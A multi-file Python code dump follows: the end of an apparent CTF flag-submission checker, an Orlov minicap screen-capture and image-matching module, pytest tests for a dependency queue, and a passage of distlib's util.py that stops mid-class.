'timestamp': time.time()
})
self.db.flags.update_one({'flag': data}, {"$set": {"stolen": True}})
connection.send(('received\n').encode())
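# Hedged usage sketch (host, port and flag value are illustrative): a team-side
# submitter could talk to this checker with a plain TCP client, e.g.
#   import socket
#   s = socket.create_connection(('checker.example.org', 31337))
#   s.recv(1024)                              # welcome banner
#   s.sendall(('A' * 33 + '=\n').encode())    # flag format: 33 word chars + '='
#   print(s.recv(1024).decode())              # 'received' or an error message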
|
process.py
|
""" Orlov Plugins : Minicap Process Utility. """
import os
import io
import sys
import time
import logging
import threading
from queue import Queue
import cv2
from PIL import Image
import numpy as np
import fasteners
from orlov.libs.picture import Picture, Ocr
PATH = os.path.abspath(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
if PATH not in sys.path:
sys.path.insert(0, PATH)
MAX_SIZE = 5
L = logging.getLogger(__name__)
class SearchObject(object):
""" Search Object.
Attributes:
function(str): target get function.
target(str): target image filepath.
box(tuple): target position(x, y)
"""
def __init__(self, _function, _target, _box):
self.func = _function
self.target = _target
self.box = _box
def __repr__(self):
return 'SearchObject()'
def __str__(self):
return 'Target, Box : %s, %s' % (os.path.basename(self.target), self.box)
# pylint: disable=E1101
class MinicapProc(object):
""" Minicap Process
Attributes:
stream(MinicapStream): Minicap Stream Object.
service(MinicapService): Minicap Service Object.
debug(bool): Debug flag.
"""
def __init__(self, _stream, _service, debug=False):
self.module = {}
self.module['stream'] = _stream
self.module['service'] = _service
self.space = {}
self.output = Queue()
self._loop_flag = True
self._debug = debug
self._search = None
self.search_result = Queue()
self.counter = 1
self.lock = fasteners.InterProcessLock('.lockfile')
def start(self, _adb, _workspace, _package=None):
""" Minicap Process Start.
Arguments:
_adb(Android): android adaptor object.
_workspace(Workspace): workspace adaptor object.
- log : workspace.log
- tmp : workspace.tmp
- evidence : workspace.tmp.evidence
- reference : workspace.tmp.reference
"""
self.module['adb'] = _adb
self.module['workspace'] = _workspace
self.module['workspace'].mkdir('tmp')
self.space['log'] = self.module['workspace'].mkdir('log')
if _package is None:
self.space['tmp'] = self.module['workspace'].mkdir('tmp')
self.space['tmp.evidence'] = self.module['workspace'].mkdir('tmp\\evidence')
self.space['tmp.reference'] = self.module['workspace'].mkdir('tmp\\reference')
self.space['tmp.video'] = self.module['workspace'].mkdir('tmp\\video')
else:
self.space['tmp'] = self.module['workspace'].mkdir('tmp\\%s' % _package)
self.space['tmp.evidence'] = self.module['workspace'].mkdir('tmp\\%s\\evidence' % _package)
self.space['tmp.reference'] = self.module['workspace'].mkdir('tmp\\%s\\reference' % _package)
self.space['tmp.video'] = self.module['workspace'].mkdir('tmp\\%s\\video' % _package)
self.module['service'].start(self.module['adb'], self.space['log'])
time.sleep(1)
self.module['adb'].forward('tcp:%s localabstract:minicap' % str(self.module['stream'].get_port()))
self.module['stream'].start()
threading.Thread(target=self.main_loop).start()
def finish(self):
""" Minicap Process Finish.
"""
self._loop_flag = False
time.sleep(1)
self.module['stream'].finish()
if 'service' in self.module and self.module['service'] is not None:
self.module['service'].stop()
def get_d(self) -> int:
""" Get output queue size.
Returns:
size(int): output queue size.
"""
return self.output.qsize()
def get_frame(self) -> object:
""" Get frame image in output.
Returns:
objects(object): image data.
"""
return self.output.get()
def __save(self, filename, data):
""" Save framedata in files.
Arguments:
filename(str): saved filename.
data(object): save framedata.
"""
with open(filename, 'wb') as f:
f.write(data)
f.flush()
def __save_cv(self, filename, img_cv) -> str:
""" Save framedata in files. (opencv)
Arguments:
filename(str): saved filename.
img_cv(numpy.ndarray): framedata(opencv).
Returns:
filepath(str): filepath
"""
return filename if cv2.imwrite(filename, img_cv) else None
def __save_evidence(self, number, data):
""" Save Evidence Data.
Arguments:
number(int): counter number.
data(object): save framedata.
"""
zpnum = '{0:08d}'.format(int(number))
if 'tmp.evidence' in self.space:
self.__save_cv(os.path.join(self.space['tmp.evidence'], 'image_%s.png' % str(zpnum)), data)
def __search(self, func, target, box=None, _timeout=5) -> object:
""" Search Object.
Arguments:
func(str): function name.
- capture, patternmatch, ocr.
target(object): Target Object. only capture, filename.
box(tuple): box object. (x, y, width, height)
_timeout(int): Expired Time. default : 5.
Returns:
result(object): return target.
"""
with self.lock:
self._search = SearchObject(func, target, box)
result = self.search_result.get(timeout=_timeout)
self._search = None
return result
def capture_image(self, filename, _timeout=5) -> str:
""" Capture Image File.
Arguments:
filename(str): filename.
_timeout(int): Expired Time. default : 5.
Returns:
result(str): filename
"""
return self.__search('capture', filename, None, _timeout)
def search_pattern(self, target, box=None, _timeout=5):
""" Search Pattern Match File.
Arguments:
target(str): target file path.
box(tuple): target search box.
_timeout(int): timeout.
Returns:
result(tuple): search pattern point.
"""
return self.__search('patternmatch', target, box, _timeout)
def search_ocr(self, box=None, _timeout=5):
""" Search OCR File.
Arguments:
box(tuple): target search box.
_timeout(int): timeout.
Returns:
result(tuple): search pattern point.
"""
return self.__search('ocr', 'dummy', box, _timeout)
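# Hedged usage sketch (stream, service, adb and workspace are assumed to be the
# corresponding orlov objects described in the docstrings above; file names are
# examples):
#   proc = MinicapProc(stream, service, debug=False)
#   proc.start(adb, workspace, _package='com.example.app')
#   proc.capture_image('before_login.png')
#   pos = proc.search_pattern('reference/login_button.png')
#   proc.finish()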
def main_loop(self):
""" Minicap Process Main Loop.
"""
if self._debug:
cv2.namedWindow('debug')
while self._loop_flag:
data = self.module['stream'].picture.get()
save_flag = False
image_pil = Image.open(io.BytesIO(data))
image_cv = cv2.cvtColor(np.asarray(image_pil), cv2.COLOR_RGB2BGR)
if self._search is not None:
if self._search.func == 'capture':
outputfile = os.path.join(self.space['tmp'], self._search.target)
result = self.__save_cv(outputfile, image_cv)
self.search_result.put(result)
elif self._search.func == 'patternmatch':
result, image_cv = Picture.search_pattern(image_cv, self._search.target, self._search.box,
self.space['tmp'])
self.search_result.put(result)
save_flag = True
elif self._search.func == 'ocr':
result, image_cv = Ocr.img_to_string(image_cv, self._search.box, self.space['tmp'])
self.search_result.put(result)
save_flag = True
else:
L.warning('Could not find function : %s', self._search.func)
if (not self.counter % 5) or save_flag:
self.__save_evidence(self.counter / 5, image_cv)
if self._debug:
if self.module['adb'] is None:
resize_image_cv = cv2.resize(image_cv, (640, 360))
else:
h = int(int(self.module['adb'].get().MINICAP_WIDTH) / 2)
w = int(int(self.module['adb'].get().MINICAP_HEIGHT) / 2)
if not int(self.module['adb'].get().ROTATE):
resize_image_cv = cv2.resize(image_cv, (h, w))
else:
resize_image_cv = cv2.resize(image_cv, (w, h))
cv2.imshow('debug', resize_image_cv)
key = cv2.waitKey(5)
if key == 27:
break
self.counter += 1
if self._debug:
cv2.destroyAllWindows()
|
test_dependentqueue.py
|
from multiprocessing import Manager, Process
from queue import Queue, Empty
import logging
from ctypes import c_int
import time
import pytest
from tx.functional.either import Left, Right
from tx.functional.maybe import Just
from tx.parallex.dependentqueue import DependentQueue, Node
from tx.readable_log import getLogger
from .test_utils import object_store, manager
logger = getLogger(__name__, logging.DEBUG)
def test_dep(manager, object_store):
dq = DependentQueue(manager, None, object_store)
dq.init_thread()
id3 = dq.put(3, names={"a"})
id2 = dq.put(2, depends_on={id3: {"a"}}, names={"b"})
id1 = dq.put(1, depends_on={id3: {"a"}, id2: {"b"}})
n, r, sr, f1 = dq.get(block=True)
assert n == 3
assert r == {}
dq.complete(f1, Right({"a": 6}))
n, r, sr, f2 = dq.get(block=True)
assert n == 2
assert r == {"a": 6}
dq.complete(f2, Right({"b": 5}))
n, r, sr, f = dq.get(block=True)
assert n == 1
assert r == {"b": 5, "a": 6}
dq.complete(f, Right({"c": 4}))
n, r, sr, f = dq.get(block=True)
assert n is None
def test_dep_error(manager, object_store):
dq = DependentQueue(manager, None, object_store)
dq.init_thread()
id3 = dq.put(3, names={"a"})
id2 = dq.put(2, depends_on={id3: {"a"}}, names={"b"})
id1 = dq.put(1, depends_on={id3: {"a"}, id2: {"b"}})
n, r, sr, f1 = dq.get(block=True)
assert n == 3
assert r == {}
dq.complete(f1, Right({"a": Left("a")}))
n, r, sr, f2 = dq.get(block=True)
assert n == 2
assert r == {"a": Left("a")}
def test_dep_error_2(manager, object_store):
dq = DependentQueue(manager, None, object_store)
dq.init_thread()
id3 = dq.put(3, names={"a"})
id2 = dq.put(2, depends_on={id3: {"a"}}, names={"b"})
id1 = dq.put(1, depends_on={id3: {"a"}, id2: {"b"}})
n, r, sr, f1 = dq.get(block=True)
assert n == 3
assert r == {}
dq.complete(f1, Left("a"))
n, r, sr, f2 = dq.get(block=True)
assert n == 2
assert r == {"a": Left("a")}
def test_eoq(manager, object_store):
dq = DependentQueue(manager, 2, object_store)
dq.init_thread()
def dq_get(v):
logger.debug("before")
v.value, _, _, _ = dq.get()
logger.debug("after")
id3 = dq.put(2)
logger.debug("get next node")
n, _, _, f1 = dq.get(block=True)
logger.debug("next node found")
v = manager.Value(c_int, 1)
p = Process(target=dq_get, args=(v,))
logger.debug("start process")
p.start()
time.sleep(1)
logger.debug("process running")
dq.complete(f1, Just({"a":6}))
logger.debug("queue completed")
p.join()
assert v.value == 2
def test_eoq_2(manager, object_store):
dq = DependentQueue(manager, 2, object_store)
dq.init_thread()
id3 = dq.put(3)
n, r, sr, f1 = dq.get(block=True)
assert n == 3
assert r == {}
dq.complete(f1, Just({"a": 6}))
n, r, sr, f = dq.get(block=True)
assert n == 2
# def test_eoq_3():
#
# dq = DependentQueue(True)
# n, r, sr, f = dq.get(block=False)
# assert n == 2
# n, r, sr, f = dq.get(block=True)
# assert n == 2
|
util.py
|
#
# Copyright (C) 2012-2013 The Python Software Foundation.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import codecs
from collections import deque
import contextlib
import csv
from glob import iglob as std_iglob
import io
import json
import logging
import os
import py_compile
import re
import shutil
import socket
import ssl
import subprocess
import sys
import tarfile
import tempfile
try:
import threading
except ImportError:
import dummy_threading as threading
import time
from . import DistlibException
from .compat import (string_types, text_type, shutil, raw_input, StringIO,
cache_from_source, urlopen, httplib, xmlrpclib, splittype,
HTTPHandler, HTTPSHandler as BaseHTTPSHandler,
BaseConfigurator, valid_ident, Container, configparser,
URLError, match_hostname, CertificateError, ZipFile)
logger = logging.getLogger(__name__)
#
# Requirement parsing code for name + optional constraints + optional extras
#
# e.g. 'foo >= 1.2, < 2.0 [bar, baz]'
#
# The regex can seem a bit hairy, so we build it up out of smaller pieces
# which are manageable.
#
COMMA = r'\s*,\s*'
COMMA_RE = re.compile(COMMA)
IDENT = r'(\w|[.-])+'
EXTRA_IDENT = r'(\*|:(\*|\w+):|' + IDENT + ')'
VERSPEC = IDENT + r'\*?'
RELOP = '([<>=!~]=)|[<>]'
#
# The first relop is optional - if absent, will be taken as '~='
#
BARE_CONSTRAINTS = ('(' + RELOP + r')?\s*(' + VERSPEC + ')(' + COMMA + '(' +
RELOP + r')\s*(' + VERSPEC + '))*')
DIRECT_REF = r'(from\s+(?P<diref>.*))'
#
# Either the bare constraints or the bare constraints in parentheses
#
CONSTRAINTS = (r'\(\s*(?P<c1>' + BARE_CONSTRAINTS + '|' + DIRECT_REF +
               r')\s*\)|(?P<c2>' + BARE_CONSTRAINTS + r'\s*)')
EXTRA_LIST = EXTRA_IDENT + '(' + COMMA + EXTRA_IDENT + ')*'
EXTRAS = r'\[\s*(?P<ex>' + EXTRA_LIST + r')?\s*\]'
REQUIREMENT = ('(?P<dn>' + IDENT + r')\s*(' + EXTRAS + r'\s*)?(\s*' +
CONSTRAINTS + ')?$')
REQUIREMENT_RE = re.compile(REQUIREMENT)
#
# Used to scan through the constraints
#
RELOP_IDENT = '(?P<op>' + RELOP + r')\s*(?P<vn>' + VERSPEC + ')'
RELOP_IDENT_RE = re.compile(RELOP_IDENT)
def parse_requirement(s):
def get_constraint(m):
d = m.groupdict()
return d['op'], d['vn']
result = None
m = REQUIREMENT_RE.match(s)
if m:
d = m.groupdict()
name = d['dn']
cons = d['c1'] or d['c2']
if not d['diref']:
url = None
else:
# direct reference
cons = None
url = d['diref'].strip()
if not cons:
cons = None
constr = ''
rs = d['dn']
else:
if cons[0] not in '<>!=':
cons = '~=' + cons
iterator = RELOP_IDENT_RE.finditer(cons)
cons = [get_constraint(m) for m in iterator]
rs = '%s (%s)' % (name, ', '.join(['%s %s' % con for con in cons]))
if not d['ex']:
extras = None
else:
extras = COMMA_RE.split(d['ex'])
result = Container(name=name, constraints=cons, extras=extras,
requirement=rs, source=s, url=url)
return result
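# Illustrative usage sketch (not part of the original distlib util.py): with the
# grammar above, a name plus extras plus parenthesised constraints should parse
# into a Container roughly as follows.
def _example_parse_requirement():
    r = parse_requirement('foo [bar, baz] (>= 1.2, < 2.0)')
    # r.name        -> 'foo'
    # r.extras      -> ['bar', 'baz']
    # r.constraints -> [('>=', '1.2'), ('<', '2.0')]
    # r.requirement -> 'foo (>= 1.2, < 2.0)'
    return r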
def get_resources_dests(resources_root, rules):
"""Find destinations for resources files"""
def get_rel_path(base, path):
# normalizes and returns a lstripped-/-separated path
base = base.replace(os.path.sep, '/')
path = path.replace(os.path.sep, '/')
assert path.startswith(base)
return path[len(base):].lstrip('/')
destinations = {}
for base, suffix, dest in rules:
prefix = os.path.join(resources_root, base)
for abs_base in iglob(prefix):
abs_glob = os.path.join(abs_base, suffix)
for abs_path in iglob(abs_glob):
resource_file = get_rel_path(resources_root, abs_path)
if dest is None: # remove the entry if it was here
destinations.pop(resource_file, None)
else:
rel_path = get_rel_path(abs_base, abs_path)
rel_dest = dest.replace(os.path.sep, '/').rstrip('/')
destinations[resource_file] = rel_dest + '/' + rel_path
return destinations
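# Illustrative sketch (not part of the original module; the paths are hypothetical):
# given resources_root containing 'cfg/app.ini', a rule of the form
# (base, suffix_glob, dest) such as ('cfg', '*.ini', '{confdir}') yields
# {'cfg/app.ini': '{confdir}/app.ini'}; a dest of None removes a previous match.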
def in_venv():
if hasattr(sys, 'real_prefix'):
# virtualenv venvs
result = True
else:
# PEP 405 venvs
result = sys.prefix != getattr(sys, 'base_prefix', sys.prefix)
return result
def get_executable():
if sys.platform == 'darwin' and ('__VENV_LAUNCHER__'
in os.environ):
result = os.environ['__VENV_LAUNCHER__']
else:
result = sys.executable
return result
def proceed(prompt, allowed_chars, error_prompt=None, default=None):
p = prompt
while True:
s = raw_input(p)
p = prompt
if not s and default:
s = default
if s:
c = s[0].lower()
if c in allowed_chars:
break
if error_prompt:
p = '%c: %s\n%s' % (c, error_prompt, prompt)
return c
def extract_by_key(d, keys):
if isinstance(keys, string_types):
keys = keys.split()
result = {}
for key in keys:
if key in d:
result[key] = d[key]
return result
def read_exports(stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader('utf-8')(stream)
# Try to load as JSON, falling back on legacy format
data = stream.read()
stream = StringIO(data)
try:
data = json.load(stream)
result = data['exports']
for group, entries in result.items():
for k, v in entries.items():
s = '%s = %s' % (k, v)
entry = get_export_entry(s)
assert entry is not None
entries[k] = entry
return result
except Exception:
stream.seek(0, 0)
cp = configparser.ConfigParser()
if hasattr(cp, 'read_file'):
cp.read_file(stream)
else:
cp.readfp(stream)
result = {}
for key in cp.sections():
result[key] = entries = {}
for name, value in cp.items(key):
s = '%s = %s' % (name, value)
entry = get_export_entry(s)
assert entry is not None
#entry.dist = self
entries[name] = entry
return result
def write_exports(exports, stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getwriter('utf-8')(stream)
cp = configparser.ConfigParser()
for k, v in exports.items():
# TODO check k, v for valid values
cp.add_section(k)
for entry in v.values():
if entry.suffix is None:
s = entry.prefix
else:
s = '%s:%s' % (entry.prefix, entry.suffix)
if entry.flags:
s = '%s [%s]' % (s, ', '.join(entry.flags))
cp.set(k, entry.name, s)
cp.write(stream)
@contextlib.contextmanager
def tempdir():
td = tempfile.mkdtemp()
try:
yield td
finally:
shutil.rmtree(td)
@contextlib.contextmanager
def chdir(d):
cwd = os.getcwd()
try:
os.chdir(d)
yield
finally:
os.chdir(cwd)
@contextlib.contextmanager
def socket_timeout(seconds=15):
cto = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(seconds)
yield
finally:
socket.setdefaulttimeout(cto)
class cached_property(object):
def __init__(self, func):
self.func = func
#for attr in ('__name__', '__module__', '__doc__'):
# setattr(self, attr, getattr(func, attr, None))
def __get__(self, obj, cls=None):
if obj is None:
return self
value = self.func(obj)
object.__setattr__(obj, self.func.__name__, value)
#obj.__dict__[self.func.__name__] = value = self.func(obj)
return value
def convert_path(pathname):
"""Return 'pathname' as a name that will work on the native filesystem.
The path is split on '/' and put back together again using the current
directory separator. Needed because filenames in the setup script are
always supplied in Unix style, and have to be converted to the local
convention before we can actually use them in the filesystem. Raises
ValueError on non-Unix-ish systems if 'pathname' either starts or
ends with a slash.
"""
if os.sep == '/':
return pathname
if not pathname:
return pathname
if pathname[0] == '/':
raise ValueError("path '%s' cannot be absolute" % pathname)
if pathname[-1] == '/':
raise ValueError("path '%s' cannot end with '/'" % pathname)
paths = pathname.split('/')
while os.curdir in paths:
paths.remove(os.curdir)
if not paths:
return os.curdir
return os.path.join(*paths)
class FileOperator(object):
def __init__(self, dry_run=False):
self.dry_run = dry_run
self.ensured = set()
self._init_record()
def _init_record(self):
self.record = False
self.files_written = set()
self.dirs_created = set()
def record_as_written(self, path):
if self.record:
self.files_written.add(path)
def newer(self, source, target):
"""Tell if the target is newer than the source.
Returns true if 'source' exists and is more recently modified than
'target', or if 'source' exists and 'target' doesn't.
Returns false if both exist and 'target' is the same age or younger
than 'source'. Raise PackagingFileError if 'source' does not exist.
Note that this test is not very accurate: files created in the same
second will have the same "age".
"""
if not os.path.exists(source):
raise DistlibException("file '%r' does not exist" %
os.path.abspath(source))
if not os.path.exists(target):
return True
return os.stat(source).st_mtime > os.stat(target).st_mtime
def copy_file(self, infile, outfile, check=True):
"""Copy a file respecting dry-run and force flags.
"""
self.ensure_dir(os.path.dirname(outfile))
logger.info('Copying %s to %s', infile, outfile)
if not self.dry_run:
msg = None
if check:
if os.path.islink(outfile):
msg = '%s is a symlink' % outfile
elif os.path.exists(outfile) and not os.path.isfile(outfile):
msg = '%s is a non-regular file' % outfile
if msg:
raise ValueError(msg + ' which would be overwritten')
shutil.copyfile(infile, outfile)
self.record_as_written(outfile)
def copy_stream(self, instream, outfile, encoding=None):
assert not os.path.isdir(outfile)
self.ensure_dir(os.path.dirname(outfile))
logger.info('Copying stream %s to %s', instream, outfile)
if not self.dry_run:
if encoding is None:
outstream = open(outfile, 'wb')
else:
outstream = codecs.open(outfile, 'w', encoding=encoding)
try:
shutil.copyfileobj(instream, outstream)
finally:
outstream.close()
self.record_as_written(outfile)
def write_binary_file(self, path, data):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
with open(path, 'wb') as f:
f.write(data)
self.record_as_written(path)
def write_text_file(self, path, data, encoding):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
with open(path, 'wb') as f:
f.write(data.encode(encoding))
self.record_as_written(path)
def set_mode(self, bits, mask, files):
if os.name == 'posix' or (os.name == 'java' and os._name == 'posix'):
# Set the executable bits (owner, group, and world) on
# all the files specified.
for f in files:
if self.dry_run:
logger.info("changing mode of %s", f)
else:
mode = (os.stat(f).st_mode | bits) & mask
logger.info("changing mode of %s to %o", f, mode)
os.chmod(f, mode)
set_executable_mode = lambda s, f: s.set_mode(0o555, 0o7777, f)
def ensure_dir(self, path):
path = os.path.abspath(path)
if path not in self.ensured and not os.path.exists(path):
self.ensured.add(path)
d, f = os.path.split(path)
self.ensure_dir(d)
logger.info('Creating %s' % path)
if not self.dry_run:
os.mkdir(path)
if self.record:
self.dirs_created.add(path)
def byte_compile(self, path, optimize=False, force=False, prefix=None):
dpath = cache_from_source(path, not optimize)
logger.info('Byte-compiling %s to %s', path, dpath)
if not self.dry_run:
if force or self.newer(path, dpath):
if not prefix:
diagpath = None
else:
assert path.startswith(prefix)
diagpath = path[len(prefix):]
py_compile.compile(path, dpath, diagpath, True) # raise error
self.record_as_written(dpath)
return dpath
def ensure_removed(self, path):
if os.path.exists(path):
if os.path.isdir(path) and not os.path.islink(path):
logger.debug('Removing directory tree at %s', path)
if not self.dry_run:
shutil.rmtree(path)
if self.record:
if path in self.dirs_created:
self.dirs_created.remove(path)
else:
if os.path.islink(path):
s = 'link'
else:
s = 'file'
logger.debug('Removing %s %s', s, path)
if not self.dry_run:
os.remove(path)
if self.record:
if path in self.files_written:
self.files_written.remove(path)
def is_writable(self, path):
result = False
while not result:
if os.path.exists(path):
result = os.access(path, os.W_OK)
break
parent = os.path.dirname(path)
if parent == path:
break
path = parent
return result
def commit(self):
"""
Commit recorded changes, turn off recording, return
changes.
"""
assert self.record
result = self.files_written, self.dirs_created
self._init_record()
return result
def rollback(self):
if not self.dry_run:
for f in list(self.files_written):
if os.path.exists(f):
os.remove(f)
# dirs should all be empty now, except perhaps for
# __pycache__ subdirs
# reverse so that subdirs appear before their parents
dirs = sorted(self.dirs_created, reverse=True)
for d in dirs:
flist = os.listdir(d)
if flist:
assert flist == ['__pycache__']
sd = os.path.join(d, flist[0])
os.rmdir(sd)
os.rmdir(d) # should fail if non-empty
self._init_record()
def resolve(module_name, dotted_path):
if module_name in sys.modules:
mod = sys.modules[module_name]
else:
mod = __import__(module_name)
if dotted_path is None:
result = mod
else:
parts = dotted_path.split('.')
result = getattr(mod, parts.pop(0))
for p in parts:
result = getattr(result, p)
return result
class ExportEntry(object):
def __init__(self, name, prefix, suffix, flags):
self.name = name
self.prefix = prefix
self.suffix = suffix
self.flags = flags
@cached_property
def value(self):
return resolve(self.prefix, self.suffix)
def __repr__(self):
return '<ExportEntry %s = %s:%s %s>' % (self.name, self.prefix,
self.suffix, self.flags)
def __eq__(self, other):
if not isinstance(other, ExportEntry):
result = False
else:
result = (self.name == other.name and
self.prefix == other.prefix and
self.suffix == other.suffix and
self.flags == other.flags)
return result
__hash__ = object.__hash__
ENTRY_RE = re.compile(r'''(?P<name>(\w|[-.])+)
\s*=\s*(?P<callable>(\w+)([:\.]\w+)*)
\s*(\[\s*(?P<flags>\w+(=\w+)?(,\s*\w+(=\w+)?)*)\s*\])?
''', re.VERBOSE)
def get_export_entry(specification):
m = ENTRY_RE.search(specification)
if not m:
result = None
if '[' in specification or ']' in specification:
raise DistlibException('Invalid specification '
'%r' % specification)
else:
d = m.groupdict()
name = d['name']
path = d['callable']
colons = path.count(':')
if colons == 0:
prefix, suffix = path, None
else:
if colons != 1:
raise DistlibException('Invalid specification '
'%r' % specification)
prefix, suffix = path.split(':')
flags = d['flags']
if flags is None:
if '[' in specification or ']' in specification:
raise DistlibException('Invalid specification '
'%r' % specification)
flags = []
else:
flags = [f.strip() for f in flags.split(',')]
result = ExportEntry(name, prefix, suffix, flags)
return result
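# Illustrative usage sketch (not part of the original module): an export
# specification of the form 'name = prefix:suffix [flags]' is parsed like so.
def _example_get_export_entry():
    e = get_export_entry('foo = foo.main:main [wrap]')
    # e.name -> 'foo', e.prefix -> 'foo.main', e.suffix -> 'main', e.flags -> ['wrap']
    return e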
def get_cache_base(suffix=None):
"""
Return the default base location for distlib caches. If the directory does
not exist, it is created. Use the suffix provided for the base directory,
and default to '.distlib' if it isn't provided.
On Windows, if LOCALAPPDATA is defined in the environment, then it is
assumed to be a directory, and will be the parent directory of the result.
On POSIX, and on Windows if LOCALAPPDATA is not defined, the user's home
directory - using os.expanduser('~') - will be the parent directory of
the result.
The result is just the directory '.distlib' in the parent directory as
determined above, or with the name specified with ``suffix``.
"""
if suffix is None:
suffix = '.distlib'
if os.name == 'nt' and 'LOCALAPPDATA' in os.environ:
result = os.path.expandvars('$localappdata')
else:
# Assume posix, or old Windows
result = os.path.expanduser('~')
result = os.path.join(result, suffix)
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if os.path.isdir(result):
usable = os.access(result, os.W_OK)
if not usable:
logger.warning('Directory exists but is not writable: %s', result)
else:
try:
os.makedirs(result)
usable = True
except OSError:
logger.warning('Unable to create %s', result, exc_info=True)
usable = False
if not usable:
result = tempfile.mkdtemp()
logger.warning('Default location unusable, using %s', result)
return result
def path_to_cache_dir(path):
"""
Convert an absolute path to a directory name for use in a cache.
The algorithm used is:
#. On Windows, any ``':'`` in the drive is replaced with ``'---'``.
#. Any occurrence of ``os.sep`` is replaced with ``'--'``.
#. ``'.cache'`` is appended.
"""
d, p = os.path.splitdrive(os.path.abspath(path))
if d:
d = d.replace(':', '---')
p = p.replace(os.sep, '--')
return d + p + '.cache'
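# Illustrative sketch (not part of the original module): on a POSIX system,
# path_to_cache_dir('/home/user/project') -> '--home--user--project.cache'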
def ensure_slash(s):
if not s.endswith('/'):
return s + '/'
return s
def parse_credentials(netloc):
username = password = None
if '@' in netloc:
prefix, netloc = netloc.split('@', 1)
if ':' not in prefix:
username = prefix
else:
username, password = prefix.split(':', 1)
return username, password, netloc
def get_process_umask():
result = os.umask(0o22)
os.umask(result)
return result
def is_string_sequence(seq):
result = True
i = None
for i, s in enumerate(seq):
if not isinstance(s, string_types):
result = False
break
assert i is not None
return result
PROJECT_NAME_AND_VERSION = re.compile('([a-z0-9_]+([.-][a-z_][a-z0-9_]*)*)-'
'([a-z0-9_.+-]+)', re.I)
PYTHON_VERSION = re.compile(r'-py(\d\.?\d?)')
def split_filename(filename, project_name=None):
"""
Extract name, version, python version from a filename (no extension)
Return name, version, pyver or None
"""
result = None
pyver = None
m = PYTHON_VERSION.search(filename)
if m:
pyver = m.group(1)
filename = filename[:m.start()]
if project_name and len(filename) > len(project_name) + 1:
m = re.match(re.escape(project_name) + r'\b', filename)
if m:
n = m.end()
result = filename[:n], filename[n + 1:], pyver
if result is None:
m = PROJECT_NAME_AND_VERSION.match(filename)
if m:
result = m.group(1), m.group(3), pyver
return result
# Allow spaces in name because of legacy dists like "Twisted Core"
NAME_VERSION_RE = re.compile(r'(?P<name>[\w .-]+)\s*'
r'\(\s*(?P<ver>[^\s)]+)\)$')
def parse_name_and_version(p):
"""
A utility method used to get name and version from a string.
From e.g. a Provides-Dist value.
:param p: A value in a form 'foo (1.0)'
:return: The name and version as a tuple.
"""
m = NAME_VERSION_RE.match(p)
if not m:
raise DistlibException('Ill-formed name/version string: \'%s\'' % p)
d = m.groupdict()
return d['name'].strip().lower(), d['ver']
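# Illustrative sketch (not part of the original module):
# parse_name_and_version('Twisted Core (12.0.1)') -> ('twisted core', '12.0.1')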
def get_extras(requested, available):
result = set()
requested = set(requested or [])
available = set(available or [])
if '*' in requested:
requested.remove('*')
result |= available
for r in requested:
if r == '-':
result.add(r)
elif r.startswith('-'):
unwanted = r[1:]
if unwanted not in available:
logger.warning('undeclared extra: %s' % unwanted)
if unwanted in result:
result.remove(unwanted)
else:
if r not in available:
logger.warning('undeclared extra: %s' % r)
result.add(r)
return result
#
# Extended metadata functionality
#
def _get_external_data(url):
result = {}
try:
# urlopen might fail if it runs into redirections,
# because of Python issue #13696. Fixed in locators
# using a custom redirect handler.
resp = urlopen(url)
headers = resp.info()
if headers.get('Content-Type') != 'application/json':
logger.debug('Unexpected response for JSON request')
else:
reader = codecs.getreader('utf-8')(resp)
#data = reader.read().decode('utf-8')
#result = json.loads(data)
result = json.load(reader)
except Exception as e:
logger.exception('Failed to get external data for %s: %s', url, e)
return result
def get_project_data(name):
url = ('https://www.red-dove.com/pypi/projects/'
'%s/%s/project.json' % (name[0].upper(), name))
result = _get_external_data(url)
return result
def get_package_data(name, version):
url = ('https://www.red-dove.com/pypi/projects/'
'%s/%s/package-%s.json' % (name[0].upper(), name, version))
return _get_external_data(url)
class EventMixin(object):
"""
A very simple publish/subscribe system.
"""
def __init__(self):
self._subscribers = {}
def add(self, event, subscriber, append=True):
"""
Add a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be added (and called when the
event is published).
:param append: Whether to append or prepend the subscriber to an
existing subscriber list for the event.
"""
subs = self._subscribers
if event not in subs:
subs[event] = deque([subscriber])
else:
sq = subs[event]
if append:
sq.append(subscriber)
else:
sq.appendleft(subscriber)
def remove(self, event, subscriber):
"""
Remove a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be removed.
"""
subs = self._subscribers
if event not in subs:
raise ValueError('No subscribers: %r' % event)
subs[event].remove(subscriber)
def get_subscribers(self, event):
"""
Return an iterator for the subscribers for an event.
:param event: The event to return subscribers for.
"""
return iter(self._subscribers.get(event, ()))
def publish(self, event, *args, **kwargs):
"""
Publish a event and return a list of values returned by its
subscribers.
:param event: The event to publish.
:param args: The positional arguments to pass to the event's
subscribers.
:param kwargs: The keyword arguments to pass to the event's
subscribers.
"""
result = []
for subscriber in self.get_subscribers(event):
try:
value = subscriber(event, *args, **kwargs)
except Exception:
logger.exception('Exception during event publication')
value = None
result.append(value)
logger.debug('publish %s: args = %s, kwargs = %s, result = %s',
event, args, kwargs, result)
return result
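# Illustrative usage sketch (not part of the original module; the names below are
# hypothetical): a class mixes in EventMixin, callers register subscribers with
# add(), and publish() returns whatever each subscriber returned.
#
#   class Locator(EventMixin):
#       pass
#
#   def on_found(event, url):
#       return url.upper()
#
#   loc = Locator()
#   loc.add('found', on_found)
#   loc.publish('found', 'http://example.com/')   # -> ['HTTP://EXAMPLE.COM/']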
#
# Simple sequencing
#
class Sequencer(object):
def __init__(self):
self._preds = {}
self._succs = {}
self._nodes = set() # nodes with no preds/succs
def add_node(self, node):
self._nodes.add(node)
def remove_node(self, node, edges=False):
if node in self._nodes:
self._nodes.remove(node)
if edges:
for p in set(self._preds.get(node, ())):
self.remove(p, node)
for s in set(self._succs.get(node, ())):
self.remove(node, s)
# Remove empties
for k, v in list(self._preds.items()):
if not v:
del self._preds[k]
for k, v in list(self._succs.items()):
if not v:
del self._succs[k]
def add(self, pred, succ):
assert pred != succ
self._preds.setdefault(succ, set()).add(pred)
